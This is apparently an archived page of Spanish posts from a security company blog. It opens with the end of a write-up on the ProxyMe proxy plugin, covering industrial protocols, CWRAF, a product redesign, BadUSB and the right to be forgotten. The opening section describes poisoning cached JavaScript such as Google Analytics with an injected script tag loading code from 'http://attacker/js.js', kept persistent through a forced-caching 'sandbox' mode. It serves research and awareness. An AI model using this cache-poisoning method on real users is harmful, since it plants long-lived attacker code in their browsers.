Este código javascript carga de forma dinámica en el árbol DOM HTML una nueva etiqueta "script" que carga a su vez otro fichero localizado en "http://attacker/js.js". Esta URL sería controlada por el atacante y contendría el código deseado. Esquema del flujo de ataque La URL controlada por el atacante es configurable. Al igual que ProxyMe, el plugin dispone de un pequeño fichero de configuración en "/Plugins/ cachepoison.cfg". Fichero de configuración del plugin La configuración es muy sencilla. Dispone de tres parámetros: "hookUrl", "mode" y "sandboxpoison". Los modos en los que puede trabajar son "open" y "sandbox". En ambos casos será necesario introducir una URL con un javascript controlado por el atacante en el parámetro "hookUrl". Modo open y sandbox La principal diferencia entre los modos "open" y "sandbox" es: Modo "open": permite que los usuarios puedan navegar como si de un proxy normal se tratara y sin ninguna limitación. En este caso el plugin "infectará" todos los ficheros javascript que solicite el navegador del usuario. Pero es importante recordar que esto puede suponer un riesgo que el atacante no tiene por qué asumir. La razón es que si se usa este modo, el servidor proxy del atacante queda expuesto para cualquier uso, por lo que podría ser utilizado para realizar otro tipo de actividad. El modo "sandbox": Solventa ese riesgo y limita la navegación a las URL indicadas en el campo "sandboxPoison". Adicionalmente se fuerza al navegador del cliente a navegar por esas direcciones para asegurar su infección. El proxy muestra un mensaje de error para evitar que el usuario sospeche. Fuerza al cliente a almacenar en caché las URLs indicadas De este modo los ficheros indicados serán cacheados en el navegador de los usuarios que hayan navegado a través del servidor proxy. En el ejemplo que se muestra a continuación se pueden ver las últimas líneas que han sido añadidas al fichero de Google Analytics. El fichero de Google Analytics resulta de especial interés en este ataque debido a que este se carga desde una gran cantidad de sitios web, por lo que cualquier sitio que utilice este javascript como recurso se verá afectado. Fichero con contenido malicioso cacheado Una vez modificado y cacheado el contenido, el usuario queda a la merced del atacante. En este estadio del ataque, ya no importa que el cliente deje de utilizar el proxy o que cierre el navegador... el contenido ha sido cacheado y pueden pasar incluso años hasta que deje de encontrase en la caché (a no ser que el usuario limpie la caché explícitamente). Como pequeña demostración, se muestra en la imagen cómo al acceder a una página legítima como puede ser https://www.elevenpaths.com (que utiliza el recurso externo https://ssl.google-analytics.com/ga.js) se cargaría el código malicioso, que a su vez haría una inclusión del código localizado en https://www.itsm3.com/hook.js. En este caso, solo se muestra un mensaje de alerta. Carga del contenido malicioso cuando ya está almacenado en caché Esta es únicamente una de las muchas utilidades que se le puede dar a ProxyMe. Si se desea conocer más o colaborar con el desarrollo de plugins, puedes contactar con el autor desde la página del proyecto. BlackHat Arsenal En cuanto al evento Arsenal en sí, resultó un éxito. Tanto por las distintas herramientas que han sido mostradas como por la representación española (cada año más numerosa y representativa). En esta edición se presentaron las herramientas "made in Spain": Voyeur, WhatsApp Privacy Guard y ProxyMe, de la mano de Juan Garrido, Jaime Sanchez y Manuel Fernández respectivamente . De izquierda a derecha: Jaime Sanchez, Nabil Ouchn, Andres Riancho, Andreas Schmidt, Juan Garrido y Manuel Fernández Pero en Arsenal, (y mucho menos en Las Vegas) no todo son conferencias. El congreso BlackHat es un lugar magnifico para realizar networking con auténticos genios de la informática con los que compartir conocimientos, anécdotas… y fiesta. * Nueva herramienta ProxyMe y ataques de cache poisoning (I) Manuel Fernández manuel.fernandez@11paths.com
21 de agosto de 2014
Introducción a la Seguridad en Redes Industriales (y III)
Antiguamente, en entornos industriales era normal encontrarse con una red de datos y una red de control "casi" completamente separadas. En la red de datos se solía transmitir gran cantidad de información, sobre todo para la toma de decisiones. Así, uno de los protocolos favoritos para las aplicaciones SCADA era el DNP (Distributed Network Protocol). Sin embargo en la red de control se transmitían pequeños paquetes de información de los elementos de campo bajo monitorización. Así que en ellas, por lo general, no se utilizaban redes ethernet con TCP/IP sino protocolos del tipo buses de campo como ModBus (de capa 7, de aplicación), HART (High way Addressable-Remote-Transducer), Device Net, o CanOpen. Si bien existen varios protocolos en ambas redes, los más comunes de encontrar son ModBus y DNP, ambos utilizados en una gran variedad de escenarios de conectividad física diferentes, que incluyen RS-232, RS-422, RS-485 y Ethernet con TCP/IP. ModBus Creado en el año 1979, es un protocolo de mensajería de la capa de aplicación del modelo OSI. Se utiliza para proporcionar comunicación cliente/servidor entre dispositivos conectados en diferentes tipos de buses de comunicación de uso industrial en general. Su diseño es antiguo y no se realizó pensando en la problemática de la seguridad. Esto tiene consecuencias que podríamos considerar "absurdas" para nuestra mirada actual. Por ejemplo, los dispositivos de ModBus no posean especificaciones claras respecto a cómo deben ser los accesos de entrada y salida a través de los PLC. Dado que los fabricantes de dispositivos con ModBus necesitan agregar más funcionalidades y no existe una definición estándar respecto a cómo deben ser enviados o recibidos los Data Types, cada uno ha agregado extensiones propietarias haciendo que en muchos casos los dispositivos entre distintos fabricantes no puedan interoperar entre sí. Los Data Types soportados por este protocolo solo se basan en entradas (Discrete Input) y salidas de 16 bits sin mayores especificaciones. Las características básicas de ModBus son: No soporta File Transfer. No posee indicadores de hora y día en su trama. Lee los valores de los rangos de entradas o salidas por la emisión de una única solicitud. Todos los datos son tratados como valor actual, por tanto, sin un dato no es leído, se pierde. Las operaciones de control que soporta son a través de la lectura/escritura de los Data Types (Coils and Holding Registers). DNP Es un estándar un poco más nuevo, de 1990. Su versión 3.0 Basic 4 fue creada en 1993. Se diseñó para ser utilizada en las aplicaciones SCADA y en las RTU de las empresas de redes eléctricas. El protocolo fue especificado particularmente para trabajar de manera serial (RS-232 o RS-485) sobre la capa física típicamente en cobre, fibra o radio, aunque también puede utilizarse en conexiones satelitales y en Ethernet (DNP3). La concepción de DNP3 se basaba principalmente en: Asegurar la integridad de los datos transmitidos. Permitir armar una estructura ágil y flexible para soportar múltiples implementaciones y ser interoperable. Aprovechar al máximo la disponibilidad de las redes cableadas sin sobrecargarlas de información. Mantener como un estándar abierto, no propietario, para asegurarse que incluya los aportes de todas las partes (representantes de las empresas, los fabricantes, los desarrolladores de RTU y los implementadores). Las características básicas de DNP: Soporta transferencia de archivos. Soporta múltiples métodos de lectura de entradas, como también la encapsulación en un solo mensaje. Posee un TimeStamp por cada lectura. Soporta cambios de eventos (actualizaciones de estado), reduciendo considerablemente el tráfico de la red. Soporta las operaciones de control a través de salida de grupos de objetos (Crob y Analog Output Blocks). Estos objetos de salida también son de lectura/escritura ya que leer el objeto de salida permite obtener las estadísticas de producción. Soporta operaciones de control por etapas (dos etapas más precisamente) como una variable de seguridad, que lamentablemente no es la que más se ve implementada. Con este control, un operador realiza una consulta "Select" y una vez que se confirma por el dispositivo esclavo, puede enviar la petición “Operate”. A diferencia de ModBus, se encuentran definidos un interesante conjunto de Data Types que describen cómo debe tratarse la información: 16 y 32 bit integral value, 32 y 64 bit floating point values, TimeStamps or not y Quality flags. La documentación de DNP3 es bastante extensa y tiene diferentes especificaciones: DNP 3.0 - Basic 4 Document Set. DNP 3.0 Data Link Layer. DNP 3.0 - Transport Functions
. DNP 3.0 - Application Layer Specification.
DNP 3.0 - Data Object Library. Para obtener más información sobre estos protocolos, recomendamos esta serie de enlaces. http://modbus.org/ http://www.dnp.org/ Modbus Protocol Reference Guide: http://www.eecs.umich.edu/~modbus/documents/PI_MBUS_300.pdf IEEE Standard Definition, Specification, and Analysis of Systems Used for Supervisory Control, Data Acquisition, and Automatic Control: http://ieeexplore.ieee.org/iel1/3389/10055/00478424.pdf IEEE Trial-Use Recommended Practice for Data Communications Between Intelligent Electronic Devices and Remote Terminal Units in a Substation: http://ieeexplore.ieee.org/iel4/5327/14435/00660326.pdf * Introducción a la seguridad en redes industriales (I) * Introducción a la seguridad en redes industriales (II) Claudio Caracciolo claudio.caracciolo@11paths.com
18 de agosto de 2014
Introducción a la seguridad en redes industriales (II)
Continuando con la introducción y partiendo del esquema por capas utilizado, se debe pensar en la reducción de riesgos en cada uno de los posibles escenarios en los que nos movemos. Analizando los vectores, se logra una mayor comprensión de la mirada de un potencial atacante. Fuente cci-es.org Vectores de ataque Muchos de los vectores relacionados con las dos capas inferiores son fácilmente detectables o reconocibles, por la propia experiencia intrínseca a la seguridad en general: a) lograr acceso físico hasta donde están los sensores, los actuadores o los PLC para alterar de alguna manera sus mediciones (en caso de los sensores) o sus configuraciones de actuación en los actuadores y los PLC. b) Interceptar, interferir y/o manipular la información de las RTU vía Wi-Fi o GPRS. Son comúnmente utilizadas para convertir señales analógicas a información digital y por tanto como conversores de protocolos, suelen ofrecer estos tipos de conectividades. Al subir en el modelo por capas propuesto, nos vamos posicionando en terrenos muy conocidos puesto que estamos hablando de aplicaciones...: c) ...que corren en sistemas operativos comunes (es muy habitual Windows XP) y que no llevan parches porque la aplicación en sí misma no los soporta. d) ... que pueden tener fallos de seguridad como cualquier otra aplicación (incorrecta validación de parámetros, escasa o nula segmentación de roles y perfiles, precario manejo de sesión, etc.) e) ...que utilizan protocolos (algunos conocidos y otros no tanto), f) ...que son utilizadas por personas que pueden cometer errores en sus procesos de monitorización o revisión, o bien tener información incorrecta por no contar con un ERP que la centralice. Un caso típico es el de los documentos Excel que cada persona involucrada tiene en su PC con los datos y filtros que él considera importantes... sin saber cuáles juzgaron importantes sus compañeros de trabajo. Dado que las técnicas para comprometer la seguridad utilizando vectores de ataque a), b) y f) son muy conocidas (ingeniería social, wireless hacking, GPRS hacking, etc.) nos centraremos en los casos: sistemas operativos (c), aplicaciones (d), protocolos (e). Sistemas Operativos Cómo muchos pueden suponer ya, el sistema operativo más utilizado para sistemas industriales es Windows. La gran mayoría de los sistemas SCADA que podemos encontrar están diseñados para ser ejecutados sobre Windows, y muy particularmente sobre XP (ya sin soporte). Curiosamente Microsoft no recomienda (ni ahora ni nunca lo ha hecho) este tipo de sistema operativo para sistemas críticos. Sin embargo, al echar un rápido vistazo por los manuales de instalación de muchos de los sistemas SCADA, es más que habitual encontrar requerimientos como los siguientes: Instalar sobre Windows XP SP 2 o SP 3. Deshabilitar la instalación de parches. No implementar actualizaciones sin el visto bueno de nuestros ingenieros (los del sistema SCADA), de lo contrario no hay garantías de funcionalidad. Asegurarse de mantener el cortafuegos desactivado. No instalar ningún producto de antivirus ni antispyware. El usuario sobre el que se ejecuta la aplicación debe disponer de permisos administrativos. En definitiva, ante el panorama propuesto, no tiene demasiado sentido ahondar en cómo y por qué supone un (sencillo e) importante vector de ataque el sistema operativo. Aplicaciones Probablemente muchos piensan que las soluciones de seguridad en los sistemas industriales se basan en las aplicaciones, pero no. Independientemente de todo el daño que se puede ocasionar a partir de comprometer el sistema operativo, las aplicaciones por sí mismas resultan (en muchos casos) perfectas para enseñar sobre hacking web: Es muy habitual encontrar problemas de cross site scripting (XSS). Sencillos problemas de inyección SQL. Carencia de cifrado. Separación de roles y funciones sin demasiados controles. Suplantación de identidades por medio de robo de cookies. Etc… Es cierto que algunos fabricantes están modificando rápidamente su forma de desarrollar aplicaciones para poder ofrecer una mejor seguridad. Sin embargo, en los procesos industriales, las actualizaciones reales de los sistemas tardan mucho tiempo en implementarse. Estamos hablando de hasta años en algunos casos. Además, se sigue dependiendo de personas que nunca trabajaron sobre el concepto de security, por lo que, hoy por hoy, es posible encontrar muchísimos sistemas industriales expuestos a internet: Vía ADSL sin conocimiento del departamento de IT y mucho menos del de seguridad. Usuarios y claves por defecto con acceso por VNC sobre HTTP. Por supuesto, mayormente acceso sobre HTTP, no sobre HTTPS. Y varias de las implementaciones sobre HTTPS sin certificados válidos. En estas instancias, está claro que hay mucho por hacer aún en el mundo industrial, que básicamente se encuentra unos diez años por detrás en términos de seguridad comparados con el mundo corporativo. Esto puede resultar muy tentador para ciertos atacantes, pero como advertencia general cabe recordar que no se debe olvidar el cuadro completo. Al ejecutar una prueba (exploit o ataque manual) sobre un sistema industrial, lo más grave ante un fallo no será que el sistema se cuelgue o se caiga un servicio, sino que algo del mundo físico puede fallar poniendo en peligro vidas humanas. Muchos sistemas industriales poseen protecciones mecánicas ante un cambio de parámetros sistematizado sin sentido o por reacción tardía de un operador, actuando como control compensatorio. Pero no todas las plantas ni procesos industriales los contemplan. Los auditores con más experiencias recordarán que lanzar un simple "nmap -sV" puede volver loco un viejo AS/400 sin actualizar, porque "bindeará" todos sus puertos. Si esto puede detener las operaciones críticas de un banco, ¿qué mal puede causar un sistema industrial que controla algún sistema físico que se encarga de transportar personas, por ejemplo? * Introducción a la seguridad en redes industriales (I) * Introducción a la seguridad en redes industriales (III) Claudio Caracciolo claudio.caracciolo@11paths.com
11 de agosto de 2014
Ocho siglas relacionadas con las vulnerabilidades (VI): CWRAF
Continuamos con la serie de entradas relacionadas al ámbito de las vulnerabilidades. MITRE también dispone de la Common Weakness Risk Analysis Framework (CWRAF). Se trata de un conjunto estandarizado de conceptos, prácticas y criterios que permite abordar la valoración de las debilidades de software de la mejor manera posible, a la vez que se adapta a los diversos dominios de negocio. La iniciativa CWRAF es tan solo una pequeña parte del proyecto de Common Weakness Enumeration (CWE) del MITRE y que al igual que el Common Weakness Scoring System (CWSS), también está patrocinado por el Software Assurance Program de la Oficina de Ciberseguridad y Comunicaciones del U.S. Department of Homeland Security (DHS). Dentro de los beneficios que esta iniciativa proporciona se encuentran: Ofrece un mecanismo para medir el riesgo de las debilidades, estudiándolas desde el punto de vista de los riesgos que entrañan para la empresa o la misión de la organización. Permite la selección y priorización automática de las debilidades, dependiendo de las necesidades específicas de la organización o su misión. Permite utilizarse en conjunto con el CWSS, con el fin de poder identificar las debilidades más importantes para el dominio de negocio de la organización y que estas puedan ampliar el proceso de Garantía de Software, informando de sus actividades e implementaciones para la protección de las aplicaciones. Permite la posibilidad de crear listas propias y personalizadas, de tipo "Top N" de las debilidades asociadas a aplicaciones y sistemas desarrollados o implementados en su entorno. En resumen, CWRAF proporciona un medio a clientes, equipos de desarrollo y organizaciones en general para priorizar las debilidades del software que son relevantes dentro de su entorno de negocio. Los usuarios de este framework, pueden fácilmente generar listas de debilidades que afecten a grupos específicos según su enfoque o requisitos. Estas listas pueden ser fácilmente aprovechadas por los distintos dominios de negocio de una organización o incluso por toda una gran empresa para enriquecer sus actividades continuas de mejora y garantizar la producción e implementación de aplicaciones y sistemas más robustos en sus entornos de operaciones. De esta forma, CWRAF puede utilizarse para colaborar con gestión de riesgos en la cadena de suministro (SCRM, Supply chain risk management) o incluso priorizar la formación y educación del personal en base a las necesidades de un sector específico de la empresa o de su totalidad. Para garantizar la efectividad, este framework admite varios escenarios de uso para distintas partes interesadas. Dentro estas partes definidas por el MITRE, se pueden encontrar desarrolladores y consumidores de software, analistas de código y consultores, investigadores de vulnerabilidades... etc. En general, cualquier otro que comparta los mismos intereses relacionados con las debilidades y sus consecuencias. Para entender un poco más cómo funciona el CWRAF, observemos la siguiente imagen que nos ofrece el MITRE. Fuente: http://cwe.mitre.org/cwraf/introduction.html#howtousecwraf En la parte superior se encuentran los dominios de negocio. Son las distintas categorías, áreas o sectores sobre los que la organización desarrolla o implementa las diversas tecnologías. Estas tecnologías, son agrupadas en grupos tecnológicos y pueden ser compartidas por distintos dominios de negocio. A su vez estos grupos tecnológicos comparten distintos escenarios (representados en la imagen como "Vignettes", siendo estos una pequeña y semi formal descripción de los escenarios) y sobre cada uno de ellos, van asociados un Business Value Context y un Technical Impact Scorecard. El primero de ellos, sirve como un puente entre las preocupaciones de seguridad que tiene el dominio de negocio y el impacto técnico de las debilidades que pudieran estar presentes en los activos de ese entorno. Este está formado por una descripción de los activos que cada dominio de negocio desea proteger dentro de cada escenario y las prioridades de seguridad asociadas a ellos, junto con los resultados de lo que podría ocurrir si alguno de estos fuera atacado. El segundo, es una lista de las posibles vulnerabilidades o acciones que pudieran conllevar la explotación de las debilidades presentes en el entorno, asociadas cada una de ellas a la capa en la que podría producirse su explotación. A cada impacto técnico se le asigna una calificación dependiendo de cómo podría afectar el desempeño de la función de negocio definida para ese entorno, y alineada con el Business Value Context. La manera en que el CWSS refleja la importancia del negocio es mediante el contexto de un entorno, el cual debe definir: Una descripción del sistema o de aplicaciones del entorno que implementan una función de negocios utilizando los distintos grupos tecnológicos. Un Business Value Context, el cual identifique cuales son los principales preocupaciones asociadas a la seguridad de las aplicaciones y sistemas presentes en ese entorno. También debe incluir el daño potencial que podría afectar al negocio si la debilidad llegara a ser explotada por un atacante. Un Technical Impact Scorecard, enumerando todos las acciones posibles que pudieran llevar a cabo un atacante que explotase una debilidad dentro de ese entorno, y la prioridad de estos impactos basados en cómo afectan el desempeño de la función de negocio. CWRAF, CWE y CWSS La manera en que CWRAF se integra con CWE y CWSS nos permite obtener una evaluación objetiva en base al dominio de negocio y la función de negocio definida para cada entorno. Para ello observemos la siguiente imagen. Fuente: http://cwe.mitre.org/cwraf/introduction.html#howtousecwraf Una vez definido todo el esquema explicado con la primera imagen, el CWRAF proporciona los entornos correctamente definidos con todas las consideraciones anteriormente mencionadas (Descripción, Business Value Context y Technical Impact Scorecard), para que con CWE se definan todas las debilidades listadas en ella que afectan directamente al dominio de negocio. Una vez definido esto, se suministran estos datos obtenidos y los mencionados anteriormente que son obtenidos con el CWRAF (los mismos que se utilizan en el paso anterior), para que con CWSS se realice la valoración de cada una de estas, teniendo en cuenta la valoración de las debilidades utilizando el impacto técnico por parte del CWE y la valoración de las debilidades utilizando el Business Value Context y Technical Impact Scorecard que suministra CWRAF. Juntando estas dos valoraciones, se realizan los cálculos correspondientes del CWSS y se le aplica un criterio de valoración asociado a la función de negocio de cada uno de los entornos, obteniendo como resultado final una lista de prioridades de las debilidades para cada entorno, identificadas estas con su respectivo CWE-ID. De esta manera se unifican tres de las siglas que hemos explicado en esta serie (CWE, CWSS y CWRAF) para ayudar a mejorar continuamente el desarrollo e implantación de aplicaciones y sistemas en su entorno y contribuir con sus funciones de negocio teniendo en todo momento presente la seguridad. * Ocho siglas relacionadas con las vulnerabilidades (I): CVE * Ocho siglas relacionadas con las vulnerabilidades (II): CWE y CAPEC * Ocho siglas relacionadas con las vulnerabilidades (III): CVSS * Ocho siglas relacionadas con las vulnerabilidades (IV): CWSS * Ocho siglas relacionadas con las vulnerabilidades (V): CVRF Umberto Schiavo umberto.schiavo@11paths.com
8 de agosto de 2014
Faast: Nuevo diseño (y II)
A lo largo del evento Eleven Paths Security Day el día 3 de julio, se presentaron nuevas funcionalidades de Faast que se han ido desarrollando desde que se presentara el producto en el pasado Innovation Day. Una de las características más vistosas es la nueva interfaz web que ofrece el servicio. Por ello, vamos a detallar en esta entrada algunas mejoras del producto, tanto de funcionalidad como de usabilidad. Continuando con la entrada anterior, analizaremos paso a paso las pantallas restantes. La visión más global de la vista a la que se accede tras la selección de un escaneo, se puede observar en la siguiente imagen: Visión completa de resultados de un escaneo. Pulsar para agrandar Vamos a recorrer brevemente cada una de las pestañas de escaneos. Resumen: Vista de resumen del escaneo Esta vista ha sufrido grandes cambios de diseño con el fin de mostrar la mayor información posible de una manera organizada y atractiva. Además se han añadido datos que en la interfaz antigua no se mostraban. Mapa de activos: Una de las novedades más llamativas de la interfaz se encuentra en esta vista. Esta innovación es lo que llamaremos árbol. Vista de mapa de activos del análisis Este árbol representa de manera jerárquica todos los dominios encontrados y para cada uno de ellos, se muestran las URLs encontradas en él ordenadas por carpetas. La siguiente figura lo muestra Árbol del mapa de activos Este cambio facilita el análisis de los dominios y URLs al usuario, además de, ofrecerle una visión global del esquema u organización. Una vez seleccionado un dominio del árbol, se muestran en la región de la derecha todos los activos encontrados en él. Vulnerabilidades: Vista de vulnerabilidades del escaneo Los cambios realizados en esta vista son en su mayoría de diseño. Las acciones disponibles para cada una de las vulnerabilidades son las siguientes: El resto de pestañas del escaneo que se muestran a continuación han sido modificadas a nivel de diseño, por lo que no se entrará en detalle con ellas. Metadatos: Vista de metadatos obtenidos Servicios de red: Vista de servicios de red del análisis Software: Vista de software Direcciones IP: Vista de direcciones IP del análisis Vista de usuarios Esta vista no incluye ninguna de las grandes novedades de la interfaz web, por lo que únicamente se presenta su nuevo diseño: Creación de usuarios Lista de usuarios creados Analizando ahora la vista de "mi cuenta", se puede ver que se ha estructurado y rediseñado notablemente. Apartado "Mi cuenta" Pensamos que tanto el diseño como las nuevas funcionalidades de esta interfaz proporcionan a Faast grandes mejoras no solo de rendimiento, sino también de usabilidad y estética. * Faast: Nuevo diseño (I) Julia Llanos julia.llanos@11paths.com
6 de agosto de 2014
badUSB: ¿De verdad que es tan grave?
Karsten Nohl y Jakob Lell hablarán en la Black Hat de BadUSB. No es "malware indetectable" ni nada por el estilo, como se está diciendo. Es el nombre "comercial" que le han puesto a una serie de herramientas o técnicas que permitirán realizar ataques más sofisticados a través de dispositivos USB (memorias flash, por ejemplo). Obviamente, esto ha sido acogido en los medios con sirenas, bombos y platillos. Veamos si en realidad es para tanto. Quiénes son Karsten Nohl es un viejo conocido en el panorama de la seguridad. En la Black Hat de 2013 demostró cómo se podía tener total acceso a una tarjeta SIM de varios operadores solamente enviando un mensaje SMS y aprovechando fallos de seguridad Java en la implementación del software de la tarjeta SIM. Jakob Lell por su parte en 2012, descubrió cómo se calculaba la contraseña predefinida en routers Belkin. Ahora han desarrollado una técnica con la que se podría infectar cualquier PC (no habla de sistema operativo) a través de un dispositivo USB. Dicen que se ha atacado al verdadero corazón de los USB y que por tanto, el ataque es prácticamente imparable a menos que se sellen físicamente los puertos del ordenador. Solamente con enchufar un USB, se podría tomar completo control del sistema. A partir de ahí, los medios describen un escenario apocalíptico en los que nadie estaría seguro. Qué se puede hacer y por qué A pesar de todas las elucubraciones que se pueden estar lanzando al respecto, lo que parecen haber creado (a la espera de detalles) es un método para modificar el firmware de dispositivos USB y cargar código. Este firmware controla las funciones más básicas, por tanto no se accede a él nunca, y mucho menos como se accede a los archivos almacenados en un USB tradicional. Así que fundamentalmente, han puesto nombre muy vendible (badUSB, sin duda inspirado en badBIOS, un FUD de principios de 2014) a una técnica consistente en modificar el firmware de un dispositivo para que se haga pasar por un teclado u otro dispositivo y cargue en el sistema (a un nivel de permisos y privilegios que se lo permita) cualquier código. En teoría, esto puede conseguirse con todo dispositivo USB, desde ratones hasta cámaras pasando por teléfonos. Lo que hace esta técnica fundamentalmente, es conseguir que un dispositivo le diga al sistema cuando se enchufa, que es un teclado, por ejemplo. ¿Existía esta técnica antes? Se ha dicho que esto son "viejas noticias". El firmware de los chips de los dispositivos no suelen ofrecer protección para reprogramarlos. A partir de ahí, se podría crear un firmware modificado que emulase un teclado o falsificar una tarjeta de red. Así, se podría como "simular" que se teclea lo que sea (y por tanto tomar el control) o redirigir el tráfico (y por tanto, también, tomar el control). Si se deja insertado durante el arranque, quizás incluso llegar más profundo al corazón del sistema operativo. Pero... ¿esto no existía antes? A muchos, este método les ha recordado a un producto que ya existe. Rubber Ducky. Se trata de lo que parece una memoria USB inocente, pero que integra un pequeño ordenador con tarjeta SD. Al conectarse a un dispositivo, es reconocido como HID (una interfaz humana) o, comúnmente, un teclado. El sistema operativo cargará su driver de teclado USB y a partir de ahí, Rubber Ducky le mandará "pulsaciones" simuladas. Las posibilidades son infinitas. Ejemplo de script para cargar mimikatz con Rubber Ducky. Fuente: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/ Parece que BadUSB ha ido más allá, y lo que han hecho es convertir un USB (¿cualquiera?) en un Rubber Ducky. Aunque como siempre, sin los detalles en la mano, surgen dudas. ¿Absolutamente todo el firmware de todos los dispositivos USB son modificables? Suponemos que no. En las demostraciones de la Black Hat, trabajarán principalmente con aparatos de Phison Electronics. ¿De verdad no hay defensas y es imparable? En el artículo original, se habla de que obviamente, ni borrando, formateando con herramientas convencionales se llega a ver ese "código" porque está en el firmware del dispositivo. No es noticia que esta parte no es analizada por ningún antimalware. Tampoco una vez cargado, así que, de ahí a disparar la imaginación: "indetectable", "imparable", etc. Luego se especula sobre que hasta podría haber cambiado la BIOS del sistema una vez infectado y ya nunca podrías confiar en el ordenador. Esto es ir mucho más allá de la técnica en sí, y solo sirve para alimentar el "miedo". Pero aun así, surgen dudas de si de verdad es imparable. Las "no-protecciones" que ofrece el artículo hablan de antimalware (que ya sabemos que no son protección suficiente bajo ninguna circunstancia). Pero... ¿de verdad que no servirían otras? En última instancia, el FUD no lo han introducido los investigadores sino los medios. La investigación es muy interesante, aunque probablemente no sea tan grave como se ha pintado. Es cierto (desde hace tiempo) que cualquier cosa que se conecte supone un problema de seguridad, y mejorarlo no está de más. Es decir, ataques similares son posibles desde hace tiempo, no hay por qué tomar medidas exclusivamente a partir de ahora. Aunque quizás sirva pare recordar a los principales fabricantes de USB que deben mejorar la seguridad de sus sistemas para impedir que su firmware sea modificado impunemente y a los usuarios, la importancia que siempre ha tenido el impedir el acceso físico al ordenador y la conexión indiscriminada de cualquier dispositivo. Sergio de los Santos ssantos@11paths.com @ssantosv
4 de agosto de 2014
El derecho al olvido y "Just delete me"
Recientemente se ha podido comprobar lo difícil que es desaparecer sin dejar ni rastro en Internet. Uno de los casos más sonados es el del español Mario Costeja González, que denunció (y venció) a Google frente a los tribunales europeos en Luxemburgo. Tras una larga lucha, consiguió entre otras cosas que se pusiera el foco en el derecho al olvido, y que muchas de las grandes compañías y corporaciones cambiaran el rumbo en sus políticas de negocio y empezaran a poner a disposición de los usuarios la capacidad de poder practicar el " Habeas data". En el caso concreto de Costeja, el epicentro de toda la polémica era una publicación del periódico digital La vanguardia, ( que aún hoy puede ser vista), donde aparecía el propio afectado en una relación de subastas judiciales públicas causadas por diversos embargos. La sentencia dictada por el tribunal de justicia europeo fue clara: El responsable directo del tratamiento de los datos personales era Google y debía proporcionar los medios, directa o indirectamente, para que los datos indexados a causa de terceros por su buscador pudieran ser eliminados. Dicho y hecho, Google se puso manos a la obra y recientemente publicó un formulario para poder ejercer el derecho al olvido de los ciudadanos. Formulario de Google para ejercer el derecho al olvido La sentencia judicial no sólo alcanzaba al ámbito de aplicación de Google, sino a cualquier buscador que indexase información y no pudiera proporcionar los medios para gestionarla consecuentemente. Así que Microsoft no tardó en reaccionar y ya cuenta también con su propio formulario de retirada de resultados de búsquedas. Ahora, como aporte dentro de sus "webtools", dispone de una herramienta que permite controlar cómo aparece una web en las búsquedas. Webtool para controlar una web en los resultados de búsquedas de Bing ¿Y Facebook? En este punto, en el que los principales buscadores han modificado su política, cambiemos de escenario. ¿Acaso no podríamos afirmar que darse de baja en una red social y eliminar los datos es practicar el derecho al olvido? Veamos un ejemplo con Facebook. Si bien Facebook no impide a ningún usuario darse de baja, parece hacer uso de un concepto molesto, reconocido y documentado: Los " dark patterns”. Estos anti patrones de diseño engañan o desorientan al usuario para impedir que encuentre fácilmente las opciones deseadas. En el caso que nos ocupa, darse de baja en determinado servicio digital. Veamos con Facebook un ejemplo de cómo una tarea que tendría que ser sencilla, se transforma en más compleja de lo que debería. Supongamos que una persona con perfil de usuario, sin mayores conocimientos informáticos, desea darse de baja permanentemente de la red social Facebook. Para ello, como es lógico, primero examina el entorno y piensa que esta posibilidad podría estar disponible en las opciones de configuración de su cuenta. Al llegar a la categoría "Seguridad", detecta que hay un enlace denominado "Desactiva tu cuenta". Desactivación de cuenta en Facebook Este enlace proporciona un formulario para desactivar la cuenta y se advierte que cierta información aún será accesible para ciertas personas. Siendo el único enlace "visible" cercano en concepto a la "baja" de la cuenta, podría dar pie al equívoco de pensar que, desactivando la cuenta, la información personal de un usuario se elimina de alguna manera. Formulario para desactivar cuenta en Facebook Pero lo cierto es que no es así. Desactivar la cuenta es siempre temporal, y Facebook permite que el usuario pueda volver a iniciar sesión con su usuario y clave, y activar de nuevo la cuenta. Incluso si no fuera así, Facebook sigue manteniendo los datos personales. En realidad este no es el camino. Pensándolo bien, "desactivar", no es dar de baja. Si de verdad se quiere eliminar la cuenta de la red, adelantamos que el entorno visual de Facebook no proporciona un enlace directo para eliminar una cuenta definitivamente. ¿Cuál sería el siguiente paso lógico a dar? Si el usuario acude a las opciones de ayuda disponibles en el entorno, debe tener cuidado. El patrón de búsqueda debe ser muy claro y no valdrán las palabras "darse de baja", sino que por ejemplo será la "eliminación de la cuenta" la consulta que podrá ofrecerle las instrucciones para conseguirlo. Una dificultad añadida parece que de forma artificial. Conseguir la información de baja a través de la ayuda Incluso así, mediante la frase de búsqueda "eliminación de cuenta", Facebook proporciona el enlace "¿Cuál es la diferencia entre "desactivar" y "eliminar" mi cuenta?". Y a través de este enlace de ayuda, por fin se consigue acceder a la página de eliminación de cuenta de Facebook de forma permanente. ¿Objetivo conseguido? Aun así, hay que tener en cuenta que Facebook establece dentro de sus términos de uso que no serán eliminados las conversaciones realizadas por el chat y otra información relevante. Aunque corresponde a cada usuario la responsabilidad de leerlos y aceptarlos, la mayoría puede que no sean conscientes. ¿Cómo obtener ayuda a la hora de borrar rastros en Internet? Con el fin de que los usuarios pudieran disponer de más información respecto de las posibilidades de practicar su derecho al olvido, se creó el servicio Just Delete Me. Este servicio permite obtener información de lo fácil, difícil o imposible que puede resultar eliminar la información de, por ejemplo, los sitios más populares de internet. Justdelete.me informando de la dificultad de páginas a la hora de darse de baja Además, proporciona entre otras funcionalidades, las siguientes: Fake identity generator: la capacidad de generar una identidad falsa (utilizada para enviar datos falsos en procesos de baja de determinados servicios digitales). Submit a site: permite reportar sitios web y la dificultad para practicar el derecho al olvido en ellos, lo que permite generar una base de datos de conocimiento muy útil para aquellas otras personas que estén pensando en darse de alta en algún determinado sitio y desconfíen de voluntad de eliminar todo rastro digital cuando se solicite. Chrome Extension "Where to delete an account": extensión gratuita para Chrome, que permite identificar rápidamente el nivel de compromiso de un sitio web respecto a la capacidad de eliminar todo dato personal de un usuario. Extensión de Chrome "Where to delete an account" Rubén Alonso ruben.alonso@11paths.com
25 de julio de 2014
Mayhem: malware para *nix, "como si fuera un Windows"
